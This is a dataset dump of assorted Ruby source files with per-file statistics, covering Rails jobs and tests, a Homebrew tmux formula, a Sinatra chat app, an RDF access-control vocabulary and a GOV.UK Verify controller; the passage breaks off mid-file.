Dataset columns (name, type, value range):

  hexsha              stringlengths   40 to 40
  size                int64           2 to 1.01M
  content             stringlengths   2 to 1.01M
  avg_line_length     float64         1.5 to 100
  max_line_length     int64           2 to 1k
  alphanum_fraction   float64         0.25 to 1
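As a quick orientation to this schema, here is a minimal Ruby sketch of filtering records on the quality statistics. It assumes, purely for illustration, that each record is exposed as a plain Hash keyed by the column names above; the content string is abbreviated and the thresholds are arbitrary, not part of the dataset definition.

# Minimal sketch: filter records on the dataset's quality statistics.
# Assumes each record is a Hash keyed by the columns above; the content
# string is abbreviated and the thresholds are illustrative only.
records = [
  {
    "hexsha" => "6125d7fbf1e2d8293e31150336ebe383f2042820",
    "size" => 199,
    "content" => "class CrudHistoryJob < ApplicationJob ...",
    "avg_line_length" => 24.875,
    "max_line_length" => 91,
    "alphanum_fraction" => 0.78392
  }
]

kept = records.select do |r|
  r["avg_line_length"] <= 100 &&
    r["max_line_length"] <= 1_000 &&
    r["alphanum_fraction"] >= 0.25
end

puts "#{kept.size} of #{records.size} records kept"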
6125d7fbf1e2d8293e31150336ebe383f2042820
199
class CrudHistoryJob < ApplicationJob
  queue_as :default

  def perform(user_id, action, content)
    CrudHistoryService.new(user_id: user_id, action: action, content: content).save_action
  end
end
24.875
91
0.78392
0354396cc0d17fe879bb82ace34083e352cada22
95
# Sample code from Programming Ruby, page 503

prc = lambda { "hello" }
prc.call
23.75
44
0.589474
2662c52f52a789db72ea09fc3108d5afae430149
599
module Makoto
  class BadMoodResponderTest < TestCase
    def setup
      @responder = BadMoodResponder.new
    end

    def test_executable?
      @responder.params = {'content' => 'ネギトロ丼', 'account' => test_account}
      assert_false(@responder.executable?)

      @responder.params = {'content' => 'おちんちん', 'account' => test_account}
      assert(@responder.executable?)
      assert(@responder.exec.present?)
    end

    def test_continue?
      assert_false(@responder.continue?)
    end

    def test_exec
      @responder.exec
      assert(@responder.paragraphs.present?)
    end
  end
end
23.038462
75
0.656093
394cac839ffbcb87859e6f9ea22a122efddaca12
111
# frozen_string_literal: true

Rails.application.routes.draw do
  devise_for :users

  root to: "home#index"
end
18.5
32
0.774775
ac8e98b6ae55bdefafcb13b7513c90c2d8d014e8
1,246
# -------------------------------------------------------------------------- #
# Copyright 2002-2022, OpenNebula Project, OpenNebula Systems                #
#                                                                            #
# Licensed under the Apache License, Version 2.0 (the "License"); you may    #
# not use this file except in compliance with the License. You may obtain    #
# a copy of the License at                                                   #
#                                                                            #
# http://www.apache.org/licenses/LICENSE-2.0                                 #
#                                                                            #
# Unless required by applicable law or agreed to in writing, software        #
# distributed under the License is distributed on an "AS IS" BASIS,          #
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.   #
# See the License for the specific language governing permissions and        #
# limitations under the License.                                             #
#--------------------------------------------------------------------------- #

$: << '.'

require 'oneflow-server'

run Sinatra::Application
62.3
78
0.407705
bf8c7bfc3235251b87f331689ea42adeff604eec
35
require 'pp'
require 'gmap_plotter'
17.5
22
0.8
0898511a246c7eaf79447c11323b60219be65d97
1,124
require 'httparty'

module PostmanMta
  class ApiRequest
    include ::HTTParty

    base_uri PostmanMta.api_endpoint

    attr_reader :request_type, :path, :options, :callback

    def initialize(request_type, path, options = {})
      @callback = PostmanMta.before_request_hook
      @request_type = request_type
      @path = path
      @options = options
    end

    def perform
      self.class.send(request_type.downcase, path, request_options)
    end

    def full_path
      @full_path ||= PostmanMta.api_endpoint + path
    end

    def uri
      @uri ||= URI(full_path)
    end

    private

    def request_options
      { headers: auth_headers, format: :json }.merge(merge_with_custom_options)
    end

    def auth_headers
      PostmanMta::Utils::SignedRequest.new(request_method: request_type.upcase, path: uri.request_uri).headers
    end

    def merge_with_custom_options
      return options unless callback

      custom_options = callback.call
      return options unless custom_options.is_a?(Hash)

      options[:body] = (options[:body] || {}).merge(custom_options)
      options
    end
  end
end
21.615385
110
0.681495
38c0fe1052030c6f092d9e0f8e3e64de587d9cb9
519
class RefreshMaterializedView
  mattr_accessor :current_thread_token

  class << self
    def call(table_name)
      Thread.new do
        token = SecureRandom.hex
        mutex.synchronize do
          self.current_thread_token = token
        end
        sleep 4
        Scenic.database.refresh_materialized_view(table_name.to_sym, concurrently: true) if current_thread_token == token
        Post.last_refresh = Time.current
      end
    end

    private

    def mutex
      @mutex ||= Mutex.new
    end
  end
end
21.625
121
0.660886
d5deef4246a274fb4a475277b3999414ff10590b
141
class TrustExistingOrganizations < ActiveRecord::Migration
  def up
    ::Organization.update_all(trusted: true)
  end

  def down
  end
end
15.666667
58
0.751773
8710ee79ff457ddf83d709a0c21191bdc589a15e
221
module Admin
  class ReportsAuditController < BaseController
    private

    def report_audit_params
      # params.permit!
      params.require(:report_audit).permit(:editor, :action, :params)
    end
  end
end
20.090909
71
0.683258
87df3294d7aff851186dc07b77d01b4bb3a10b5d
7,962
# -*- encoding: utf-8 -*- # frozen_string_literal: true # This file generated automatically using rdf vocabulary format from http://www.w3.org/ns/auth/acl# require 'rdf' module RDF::Vocab # @!parse # # Vocabulary for <http://www.w3.org/ns/auth/acl#> # class ACL < RDF::StrictVocabulary # end class ACL < RDF::StrictVocabulary("http://www.w3.org/ns/auth/acl#") # Ontology definition ontology :"http://www.w3.org/ns/auth/acl#", comment: %(Defines the class Authorization and its essential properties, and also some classes of access such as read and write. ).freeze, "dc11:title": "Basic Access Control ontology".freeze # Class definitions term :Access, "acl:label": "access".freeze, comment: %(Any kind of access to a resource. Don't use this, use R W and RW).freeze, type: "rdfs:Class".freeze term :Append, comment: %(Append accesses are specific write access which only add information, and do not remove information. For text files, for example, append access allows bytes to be added onto the end of the file. For RDF graphs, Append access allows adds triples to the graph but does not remove any. Append access is useful for dropbox functionality. Dropbox can be used for link notification, which the information added is a notification that a some link has been made elsewhere relevant to the given resource. ).freeze, label: "append".freeze, subClassOf: ["acl:Access".freeze, "acl:Write".freeze], type: "rdfs:Class".freeze term :AuthenticatedAgent, comment: %(A class of agents who have been authenticated. In other words, anyone can access this resource, but not anonymously. The social expectation is that the authentication process will provide an identify and a name, or pseudonym. \(A new ID should not be minted for every access: the intent is that the user is able to continue to use the ID for continues interactions with peers, and for example to develop a reputation\) ).freeze, label: "Anyone authenticated".freeze, subClassOf: "foaf:Agent".freeze, type: "rdfs:Class".freeze term :Authorization, comment: %(An element of access control, allowing agent to agents access of some kind to resources or classes of resources).freeze, label: "authorization".freeze, type: "rdfs:Class".freeze term :Control, comment: %(Allows read/write access to the ACL for the resource\(s\)).freeze, label: "control".freeze, subClassOf: "acl:Access".freeze, type: "rdfs:Class".freeze term :Origin, comment: %(An Origin is basically a web site \(Note WITHOUT the trailing slash after the domain name and port in its URI\) and is the basis for controlling access to data by web apps in the Same Origin Model of web security. All scripts from the same origin are given the same right.).freeze, label: "Origin".freeze, "rdfs:seeAlso": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin".freeze, type: "rdfs:Class".freeze term :Read, comment: %(The class of read operations).freeze, label: "read".freeze, subClassOf: "acl:Access".freeze, type: "rdfs:Class".freeze term :Write, label: "write".freeze, subClassOf: "acl:Access".freeze, type: "rdfs:Class".freeze # Property definitions property :accessControl, comment: %(The Access Control file for this information resource. This may of course be a virtual resource implemented by the access control system. 
Note also HTTP's header Link: foo.meta ;rel=meta can be used for this.).freeze, domain: "http://www.w3.org/2006/gen/ont#InformationResource".freeze, label: "access control".freeze, range: "http://www.w3.org/2006/gen/ont#InformationResource".freeze, subPropertyOf: "rdfs:seeAlso".freeze, type: "rdf:Property".freeze property :accessTo, comment: %(The information resource to which access is being granted.).freeze, domain: "acl:Authorization".freeze, label: "to".freeze, range: "http://www.w3.org/2006/gen/ont#InformationResource".freeze, type: "rdf:Property".freeze property :accessToClass, comment: %(A class of information resources to which access is being granted.).freeze, domain: "acl:Authorization".freeze, label: "to all in".freeze, range: "rdfs:Class".freeze, type: "rdf:Property".freeze property :agent, comment: %(A person or social entity to being given the right).freeze, domain: "acl:Authorization".freeze, label: "agent".freeze, range: "foaf:Agent".freeze, type: "rdf:Property".freeze property :agentClass, comment: %(A class of persons or social entities to being given the right).freeze, domain: "acl:Authorization".freeze, label: "agent class".freeze, range: "rdfs:Class".freeze, type: "rdf:Property".freeze property :agentGroup, comment: %(A group of persons or social entities to being given the right. The right is given to any entity which is a vcard:member of the group, as defined by the document received when the Group is dereferenced.).freeze, domain: "acl:Authorization".freeze, label: "agent group".freeze, range: "vcard:Group".freeze, type: "rdf:Property".freeze property :default, comment: %(If a resource has no ACL file \(it is 404\), then access to the resource if given by the ACL of the immediately containing directory, or failing that \(404\) the ACL of the recursively next containing directory which has an ACL file. Within that ACL file, any Authentication which has that directory as its acl:default applies to the resource. \(The highest directory must have an ACL file.\) ).freeze, domain: "acl:Authorization".freeze, label: "default access for things in this".freeze, type: "rdf:Property".freeze property :defaultForNew, comment: %(THIS IS OBSOLETE AS OF 2017-08-01. See 'default'. Was: A directory for which this authorization is used for new files in the directory.).freeze, domain: "acl:Authorization".freeze, label: "default access for new things in the object".freeze, type: "rdf:Property".freeze property :delegates, comment: %(Delegates a person or another agent to act on behalf of the agent. For example, Alice delegates Bob to act on behalf of Alice for ACL purposes.).freeze, label: "delegates".freeze, range: "foaf:Agent".freeze, type: "rdf:Property".freeze property :mode, comment: %(A mode of access such as read or write.).freeze, domain: "acl:Authorization".freeze, label: "access mode".freeze, range: "rdfs:Class".freeze, type: "rdf:Property".freeze property :origin, comment: %(A web application, identified by its Origin, such as <https://scripts.example.com>, being given the right. When a user of the web application at a certain origin accesses the server, then the browser sets the Origin: header to warn that a possibly untrusted webapp is being used. 
Then, BOTH the user AND the origin must have the required access.).freeze, domain: "acl:Authorization".freeze, label: "origin".freeze, range: "acl:Origin".freeze, "rdfs:seeAlso": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin".freeze, type: "rdf:Property".freeze property :owner, comment: %(The person or other agent which owns this. For example, the owner of a file in a filesystem. There is a sense of right to control. Typically defaults to the agent who craeted something but can be changed.).freeze, label: "owner".freeze, range: "foaf:Agent".freeze, type: "rdf:Property".freeze end end
47.112426
117
0.681487
7a48403e94b295aca7448780143d9fd78d3eab73
270
s = File.read(__dir__ + "/index.html")
s.gsub!(/\n/, "\\n");
s.gsub!(/\"/, '\"');

#s = "#define _INDEX_HTML \"#{s}\""
#s = "static const char* _INDEX_HTML = \"#{s}\";"
s = "const char index_html[] PROGMEM = \"#{s}\";"

File.write(__dir__ + "/../include/index_html.h", s)
33.75
51
0.544444
6aab513f07798c35eeac37adf3e3bb57c9ebd9a7
616
module Msf
  module RPC
    API_VERSION = "1.0"

    class Exception < RuntimeError
      attr_accessor :code, :message

      def initialize(code, message)
        self.code = code
        self.message = message
      end
    end

    class ServerException < RuntimeError
      attr_accessor :code, :error_message, :error_class, :error_backtrace

      def initialize(code, error_message, error_class, error_backtrace)
        self.code = code
        self.error_message = error_message
        self.error_class = error_class
        self.error_backtrace = error_backtrace
      end

      def to_s
        "#{self.error_class} #{self.error_message} #{self.error_backtrace}"
      end
    end
  end
end
18.117647
69
0.746753
218f5a4de8c47fdd01fbdee5265330bf14f80e85
58
module Enklawa
  module Api
    VERSION = "0.2"
  end
end
9.666667
19
0.637931
f818cdc6d81e82416b6fc09f53ce78a70df5b415
2,468
#
# Hello, friend!
#
# This lab teaches basic Ruby Object syntax.
#
# ## Watch it fail
#
# Your first real failure should be something like this:
#
#     ./friend_spec.rb:3: uninitialized constant Friend (NameError)
#
# Fix this by opening `friend.rb` and creating an empty class:
#
#     class Friend
#     end
#
# Save it. Run the test again.
#
# ## Watch it fail again
#
# Now you should see an error like this:
#
#     NoMethodError in 'Friend says hello'
#     undefined method `greeting' for #<Friend:0x1180f3c>
#     ./friend_spec.rb:5:
#
# This means that while it found the file, and it found the class, it
# couldn't find the method named "greeting".
#
# ## Define the "greeting" method
#
# In `friend.rb`, add the following inside the class (before the "end").
#
#     def greeting
#     end
#
# Save it. Run the test again.
#
# ## Watch it fail some more
#
# Now you should see an error like this:
#
#     'Friend says hello' FAILED
#     expected: "Hello!",
#     got: nil (using ==)
#     ./friend_spec.rb:5:
#
# This means that there is a method, but it's not returning anything!
# ("nil" is the Ruby way of saying "not anything".)
#
# ## Make it return something
#
# Inside the "greeting" method, put a single line containing a string
# that is *not* "Hello!". (Here we are simulating you making an honest
# mistake, so we can see what the error message looks like.)
#
#     def greeting
#       "whuh?"
#     end
#
# Save it. Run the test again.
#
# ## Watch it fail yet again
#
# Now you should see an error like this:
#
#     'Friend says hello' FAILED
#     expected: "Hello!",
#     got: "whuh?" (using ==)
#     ./friend_spec.rb:5:
#
# Correct this by changing "whuh?" to "Hello!". Save it. Run the test
# again.
#
# ## Watch it pass!
#
# Hooray! Finally! It works!
#
# ## Give yourself a high five
#
# Also, sing a song and do a little dance.
#
# ## And then...
#
# Fix the next failure! :-)
#
# Hint 1: in order to get the next test to pass, you will need to pass
# a *parameter*:
#
#     def greeting(who)
#
# Hint 2: once you do that, the **first** test might start failing
# again. To fix both at the same time, you need to provide a **default
# value** for that parameter:
#
#     def greeting(who = nil)

require "07_hello_friend"

describe Friend do
  it "says hello" do
    expect(Friend.new.greeting).to eq("Hello!")
  end

  it "says hello to someone" do
    expect(Friend.new.greeting("Bob")).to eq("Hello, Bob!")
  end
end
22.851852
72
0.645867
39b29076a18139d03ed736a3f0bb5ec79c00a14d
2,102
#!/usr/bin/env ruby
#
# stats for May Hachem
#
# an ad-hoc hack by Asaf Bartov <[email protected]>
#
# tested on Ruby 2.3.

require 'rubygems'
require 'mediawiki_api'

START_DATE = Date.new(2016,8,11)
#START_DATE = Date.new(2016,7,12)
END_DATE = Date.new(2016,8,12)

def delta_for_article(mw, art)
  r = mw.query(prop: 'revisions', titles:art, rvprop:'timestamp|size', rvlimit:500) # assume it's within the last 500 revs...
  begin
    if r.data['pages'].keys.first == '-1'
      puts "\n--> red link: #{art}"
      return -99999
    end
    revs = r.data['pages'].first[1]['revisions']
    cursize = revs[0]['size']
    last_relevant_rev = nil
    first_relevant_rev = nil
    revs.each {|rev|
      revdate = Date.parse(rev['timestamp'])
      if revdate >= START_DATE and revdate <= END_DATE
        last_relevant_rev = rev if last_relevant_rev.nil?
        first_relevant_rev = rev # keep assigning revs until we find one that's outside the range, or end up with the creation of the article
      else
        next if last_relevant_rev.nil? # haven't reached the interested revs yet; keep looking
        first_relevant_rev = rev # mark this latest rev *outside* the desired range, and stop
        break
      end
    }
    unless first_relevant_rev.nil? and last_relevant_rev.nil?
      return last_relevant_rev['size'] - first_relevant_rev['size']
    else
      return 0
    end
  rescue
    puts "\n! ERROR handling [[#{art}]]\n"
    return -99999
  end
end

# main

# initialize resources
mw = MediawikiApi::Client.new("https://en.wikipedia.org/w/api.php")

puts "reading article names..."
lines = File.open('raw_article_names.txt','r').read.split("\n")

print "gathering statistics... "
count = 0
articles = {}
lines.each {|l|
  if l =~ /\[\[(.*?)\]\]/
    print "#{count}... " if count % 20 == 1
    articles[$1] = delta_for_article(mw, $1)
  end
  count += 1
}

File.open('stats_for_may.txt','w') {|f|
  count = 1
  articles.keys.sort.each {|art|
    next if articles[art] == -99999
    f.puts "#{count},#{art.gsub(',','\,')},#{articles[art]}"
    count += 1
  }
}

puts "done!"
exit 0
27.298701
141
0.641294
ab5530f9bd40f72f365a3e611ad7cd40078b736b
10,658
require 'digest/sha1' require 'mysql2' require 'sinatra/base' class App < Sinatra::Base configure do set :session_secret, 'tonymoris' set :public_folder, File.expand_path('../../public', __FILE__) set :avatar_max_size, 1 * 1024 * 1024 enable :sessions end configure :development do require 'sinatra/reloader' register Sinatra::Reloader end helpers do def user return @_user unless @_user.nil? user_id = session[:user_id] return nil if user_id.nil? @_user = db_get_user(user_id) if @_user.nil? params[:user_id] = nil return nil end @_user end end get '/initialize' do db.query("DELETE FROM user WHERE id > 1000") db.query("DELETE FROM image WHERE id > 1001") db.query("DELETE FROM channel WHERE id > 10") db.query("DELETE FROM message WHERE id > 10000") db.query("DELETE FROM haveread") 204 end get '/' do if session.has_key?(:user_id) return redirect '/channel/1', 303 end erb :index end get '/channel/:channel_id' do if user.nil? return redirect '/login', 303 end @channel_id = params[:channel_id].to_i @channels, @description = get_channel_list_info(@channel_id) erb :channel end get '/register' do erb :register end post '/register' do name = params[:name] pw = params[:password] if name.nil? || name.empty? || pw.nil? || pw.empty? return 400 end begin user_id = register(name, pw) rescue Mysql2::Error => e return 409 if e.error_number == 1062 raise e end session[:user_id] = user_id redirect '/', 303 end get '/login' do erb :login end post '/login' do name = params[:name] statement = db.prepare('SELECT * FROM user WHERE name = ?') row = statement.execute(name).first if row.nil? || row['password'] != Digest::SHA1.hexdigest(row['salt'] + params[:password]) return 403 end session[:user_id] = row['id'] redirect '/', 303 end get '/logout' do session[:user_id] = nil redirect '/', 303 end post '/message' do user_id = session[:user_id] message = params[:message] channel_id = params[:channel_id] if user_id.nil? || message.nil? || channel_id.nil? || user.nil? return 403 end db_add_message(channel_id.to_i, user_id, message) 204 end get '/message' do user_id = session[:user_id] if user_id.nil? return 403 end channel_id = params[:channel_id].to_i last_message_id = params[:last_message_id].to_i statement = db.prepare('SELECT * FROM message WHERE id > ? AND channel_id = ? ORDER BY id DESC LIMIT 100') rows = statement.execute(last_message_id, channel_id).to_a response = [] rows.each do |row| r = {} r['id'] = row['id'] statement = db.prepare('SELECT name, display_name, avatar_icon FROM user WHERE id = ?') r['user'] = statement.execute(row['user_id']).first r['date'] = row['created_at'].strftime("%Y/%m/%d %H:%M:%S") r['content'] = row['content'] response << r statement.close end response.reverse! max_message_id = rows.empty? ? 0 : rows.map { |row| row['id'] }.max statement = db.prepare([ 'INSERT INTO haveread (user_id, channel_id, message_id, updated_at, created_at) ', 'VALUES (?, ?, ?, NOW(), NOW()) ', 'ON DUPLICATE KEY UPDATE message_id = ?, updated_at = NOW()', ].join) statement.execute(user_id, channel_id, max_message_id, max_message_id) content_type :json response.to_json end get '/fetch' do user_id = session[:user_id] if user_id.nil? return 403 end sleep 1.0 rows = db.query('SELECT id FROM channel').to_a channel_ids = rows.map { |row| row['id'] } res = [] channel_ids.each do |channel_id| statement = db.prepare('SELECT * FROM haveread WHERE user_id = ? AND channel_id = ?') row = statement.execute(user_id, channel_id).first statement.close r = {} r['channel_id'] = channel_id r['unread'] = if row.nil? 
statement = db.prepare('SELECT COUNT(*) as cnt FROM message WHERE channel_id = ?') statement.execute(channel_id).first['cnt'] else statement = db.prepare('SELECT COUNT(*) as cnt FROM message WHERE channel_id = ? AND ? < id') statement.execute(channel_id, row['message_id']).first['cnt'] end statement.close res << r end content_type :json res.to_json end get '/history/:channel_id' do if user.nil? return redirect '/login', 303 end @channel_id = params[:channel_id].to_i @page = params[:page] if @page.nil? @page = '1' end if @page !~ /\A\d+\Z/ || @page == '0' return 400 end @page = @page.to_i n = 20 statement = db.prepare('SELECT * FROM message WHERE channel_id = ? ORDER BY id DESC LIMIT ? OFFSET ?') rows = statement.execute(@channel_id, n, (@page - 1) * n).to_a statement.close @messages = [] rows.each do |row| r = {} r['id'] = row['id'] statement = db.prepare('SELECT name, display_name, avatar_icon FROM user WHERE id = ?') r['user'] = statement.execute(row['user_id']).first r['date'] = row['created_at'].strftime("%Y/%m/%d %H:%M:%S") r['content'] = row['content'] @messages << r statement.close end @messages.reverse! statement = db.prepare('SELECT COUNT(*) as cnt FROM message WHERE channel_id = ?') cnt = statement.execute(@channel_id).first['cnt'].to_f statement.close @max_page = cnt == 0 ? 1 :(cnt / n).ceil return 400 if @page > @max_page @channels, @description = get_channel_list_info(@channel_id) erb :history end get '/profile/:user_name' do if user.nil? return redirect '/login', 303 end @channels, = get_channel_list_info user_name = params[:user_name] statement = db.prepare('SELECT * FROM user WHERE name = ?') @user = statement.execute(user_name).first statement.close if @user.nil? return 404 end @self_profile = user['id'] == @user['id'] erb :profile end get '/add_channel' do if user.nil? return redirect '/login', 303 end @channels, = get_channel_list_info erb :add_channel end post '/add_channel' do if user.nil? return redirect '/login', 303 end name = params[:name] description = params[:description] if name.nil? || description.nil? return 400 end statement = db.prepare('INSERT INTO channel (name, description, updated_at, created_at) VALUES (?, ?, NOW(), NOW())') statement.execute(name, description) channel_id = db.last_id statement.close redirect "/channel/#{channel_id}", 303 end post '/profile' do if user.nil? return redirect '/login', 303 end if user.nil? return 403 end display_name = params[:display_name] avatar_name = nil avatar_data = nil file = params[:avatar_icon] unless file.nil? filename = file[:filename] if !filename.nil? && !filename.empty? ext = filename.include?('.') ? File.extname(filename) : '' unless ['.jpg', '.jpeg', '.png', '.gif'].include?(ext) return 400 end if settings.avatar_max_size < file[:tempfile].size return 400 end data = file[:tempfile].read digest = Digest::SHA1.hexdigest(data) avatar_name = digest + ext avatar_data = data end end if !avatar_name.nil? && !avatar_data.nil? statement = db.prepare('INSERT INTO image (name, data) VALUES (?, ?)') statement.execute(avatar_name, avatar_data) statement.close statement = db.prepare('UPDATE user SET avatar_icon = ? WHERE id = ?') statement.execute(avatar_name, user['id']) statement.close end if !display_name.nil? || !display_name.empty? statement = db.prepare('UPDATE user SET display_name = ? 
WHERE id = ?') statement.execute(display_name, user['id']) statement.close end redirect '/', 303 end get '/icons/:file_name' do file_name = params[:file_name] statement = db.prepare('SELECT * FROM image WHERE name = ?') row = statement.execute(file_name).first statement.close ext = file_name.include?('.') ? File.extname(file_name) : '' mime = ext2mime(ext) if !row.nil? && !mime.empty? content_type mime return row['data'] end 404 end private def db return @db_client if defined?(@db_client) @db_client = Mysql2::Client.new( host: ENV.fetch('ISUBATA_DB_HOST') { 'localhost' }, port: ENV.fetch('ISUBATA_DB_PORT') { '3306' }, username: ENV.fetch('ISUBATA_DB_USER') { 'root' }, password: ENV.fetch('ISUBATA_DB_PASSWORD') { '' }, database: 'isubata', encoding: 'utf8mb4' ) @db_client.query('SET SESSION sql_mode=\'TRADITIONAL,NO_AUTO_VALUE_ON_ZERO,ONLY_FULL_GROUP_BY\'') @db_client end def db_get_user(user_id) statement = db.prepare('SELECT * FROM user WHERE id = ?') user = statement.execute(user_id).first statement.close user end def db_add_message(channel_id, user_id, content) statement = db.prepare('INSERT INTO message (channel_id, user_id, content, created_at) VALUES (?, ?, ?, NOW())') messages = statement.execute(channel_id, user_id, content) statement.close messages end def random_string(n) Array.new(20).map { (('a'..'z').to_a + ('A'..'Z').to_a + ('0'..'9').to_a).sample }.join end def register(user, password) salt = random_string(20) pass_digest = Digest::SHA1.hexdigest(salt + password) statement = db.prepare('INSERT INTO user (name, salt, password, display_name, avatar_icon, created_at) VALUES (?, ?, ?, ?, ?, NOW())') statement.execute(user, salt, pass_digest, user, 'default.png') row = db.query('SELECT LAST_INSERT_ID() AS last_insert_id').first statement.close row['last_insert_id'] end def get_channel_list_info(focus_channel_id = nil) channels = db.query('SELECT * FROM channel ORDER BY id').to_a description = '' channels.each do |channel| if channel['id'] == focus_channel_id description = channel['description'] break end end [channels, description] end def ext2mime(ext) if ['.jpg', '.jpeg'].include?(ext) return 'image/jpeg' end if ext == '.png' return 'image/png' end if ext == '.gif' return 'image/gif' end '' end end
26.186732
138
0.615594
6a9b767a5ee6c092314741b7d930ac2ecdc5c86f
2,083
class Tmux < Formula
  desc "Terminal multiplexer"
  homepage "https://tmux.github.io/"
  url "https://github.com/tmux/tmux/releases/download/3.1c/tmux-3.1c.tar.gz"
  sha256 "918f7220447bef33a1902d4faff05317afd9db4ae1c9971bef5c787ac6c88386"
  license "ISC"
  revision 1

  livecheck do
    url "https://github.com/tmux/tmux/releases/latest"
    regex(%r{href=.*?/tag/v?(\d+(?:\.\d+)+[a-z]?)["' >]}i)
  end

  bottle do
    cellar :any
    sha256 "e1148f3043ef1e77e942bc654e6b3867f40401b0ba93e6d44a460467c51e0a3b" => :catalina
    sha256 "3ba85f3524acbf5e1fb04135fa9b7f2bbdd5d3c8ed94189685be50ca19722bbe" => :mojave
    sha256 "ec5fcbdc337221efdbf3f21121fb087b998dd7d3bf6dd5bb72e352d9c9463a57" => :high_sierra
    sha256 "bc213b9772afee0e7e465c5862edb5d957e1e90c32d7bb41c859d085521e1a4d" => :x86_64_linux
  end

  head do
    url "https://github.com/tmux/tmux.git"

    depends_on "autoconf" => :build
    depends_on "automake" => :build
    depends_on "libtool" => :build
  end

  depends_on "pkg-config" => :build
  depends_on "libevent"
  depends_on "ncurses"

  # Old versions of macOS libc disagree with utf8proc character widths.
  # https://github.com/tmux/tmux/issues/2223
  depends_on "utf8proc" if MacOS.version >= :high_sierra

  resource "completion" do
    url "https://raw.githubusercontent.com/imomaliev/tmux-bash-completion/f5d53239f7658f8e8fbaf02535cc369009c436d6/completions/tmux"
    sha256 "b5f7bbd78f9790026bbff16fc6e3fe4070d067f58f943e156bd1a8c3c99f6a6f"
  end

  def install
    system "sh", "autogen.sh" if build.head?

    args = %W[
      --disable-dependency-tracking
      --prefix=#{prefix}
      --sysconfdir=#{etc}
    ]

    args << "--enable-utf8proc" if MacOS.version >= :high_sierra

    ENV.append "LDFLAGS", "-lresolv"
    system "./configure", *args
    system "make", "install"

    pkgshare.install "example_tmux.conf"
    bash_completion.install resource("completion")
  end

  def caveats
    <<~EOS
      Example configuration has been installed to:
        #{opt_pkgshare}
    EOS
  end

  test do
    system "#{bin}/tmux", "-V"
  end
end
28.148649
132
0.712434
61372c5c2b3f56fb98f5e3f64e5dc366891b8d36
978
require 'spec_helper'
require 'mocha/api'

describe VagrantWindows::Helper , :unit => true do

  class DummyHelper
    include VagrantWindows::Helper
  end

  before(:all) do
    @dummy = DummyHelper.new
  end

  describe "win_friendly_path" do
    it "should replace slashes with backslashes" do
      @dummy.win_friendly_path('c:/tmp/dir').should eq('c:\\tmp\\dir')
    end

    it "should prepend c: drive if not drive specified" do
      @dummy.win_friendly_path('/tmp/dir').should eq('c:\\tmp\\dir')
    end

    it "should return nil if no path specified" do
      @dummy.win_friendly_path(nil).should be_nil
    end
  end

  describe "win_friendly_share_id" do
    it "should use share id if present" do
      @dummy.win_friendly_share_id('sharename').should eq('sharename')
    end

    it "should use last folder name in guest_path" do
      @dummy.win_friendly_share_id('/tmp/folder/sharename').should eq('tmp_folder_sharename')
    end
  end

end
24.45
93
0.679959
62ae202445b94e6bce05adcc96b1cb48d21dd64f
945
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

module Google
  module Apis
    module RecommenderV1beta1
      # Version of the google-apis-recommender_v1beta1 gem
      GEM_VERSION = "0.16.0"

      # Version of the code generator used to generate this client
      GENERATOR_VERSION = "0.4.0"

      # Revision of the discovery document this client was generated from
      REVISION = "20211105"
    end
  end
end
32.586207
74
0.733333
bb31117c7f039ce0cef71c04113ef7f790dfa477
573
Pod::Spec.new do |spec|
  spec.name = "WFStream"
  spec.version = "1.0.1"
  spec.summary = "WFStream is for doing sequential stream things like JAVA."
  spec.homepage = "https://github.com/WindFantasy/WFStream"
  spec.license = "MIT"
  spec.author = { "Jerry" => "[email protected]" }
  spec.source = { :git => "https://github.com/WindFantasy/WFStream.git", :tag => "#{spec.version}" }
  spec.source_files = "**/*.{h,mm,m}"
  spec.exclude_files = "WFStreamTests"
  spec.public_header_files = "**/WFStream.h", "**/wf_stream.h"
end
35.8125
106
0.614311
ab345e4bb07013387608a60423c8caa03905077e
928
module ActiveMerchant #:nodoc:
  module Billing #:nodoc:
    class PayflowExpressResponse < Response
      def email
        @params['e_mail']
      end

      def full_name
        "#{@params['name']} #{@params['lastname']}"
      end

      def token
        @params['token']
      end

      def payer_id
        @params['payer_id']
      end

      # Really the shipping country, but it is all the information provided
      def payer_country
        address['country']
      end

      def address
        {
          'name'     => full_name,
          'company'  => nil,
          'address1' => @params['street'],
          'address2' => nil,
          'city'     => @params['city'],
          'state'    => @params['state'],
          'country'  => @params['country'],
          'zip'      => @params['zip'],
          'phone'    => nil
        }
      end
    end
  end
end
23.794872
75
0.457974
086f2e742ad6290ecfd219c99197ed7b0f59eeaf
2,653
module Verify
  class AuthenticationsController < BasePublicController
    CLAIM_TIMEOUT_LENGTH_IN_MINUTES = 90

    include PartOfClaimJourney

    skip_before_action :verify_authenticity_token, only: [:create]

    # Page where a new Verify authentication request is generated and posted, as
    # described here:
    #
    # https://www.docs.verify.service.gov.uk/get-started/set-up-successful-verification-journey/#generate-an-authentication-request
    def new
      @verify_authentication_request = Verify::AuthenticationRequest.generate
      session[:verify_request_id] = @verify_authentication_request.request_id
    end

    # Callback where Verify will POST the SAML response for the authentication
    # attempt, as described here:
    #
    # https://www.docs.verify.service.gov.uk/get-started/set-up-successful-verification-journey/#handle-a-response
    def create
      @response = Verify::Response.translate(saml_response: params["SAMLResponse"], request_id: session[:verify_request_id], level_of_assurance: "LEVEL_2")

      report_redacted_response

      if @response.verified?
        parser = Claim::VerifyResponseParametersParser.new(@response.parameters)
        current_claim.update!(parser.attributes)

        redirect_to claim_url(current_policy_routing_name, "verified")
      else
        redirect_to verify_path_for_response_scenario(@response.scenario)
      end
    end

    def failed
    end

    def no_auth
    end

    # Users unable to complete the GOV.UK Verify identity assurance will be able
    # to visit this endpoint to continue their claim.
    def skip
      redirect_to claim_url(current_policy_routing_name, "name")
    end

    private

    def verify_path_for_response_scenario(scenario)
      case scenario
      when Verify::AUTHENTICATION_FAILED_SCENARIO
        failed_verify_authentications_path
      when Verify::NO_AUTHENTICATION_SCENARIO
        no_auth_verify_authentications_path
      end
    end

    def report_redacted_response
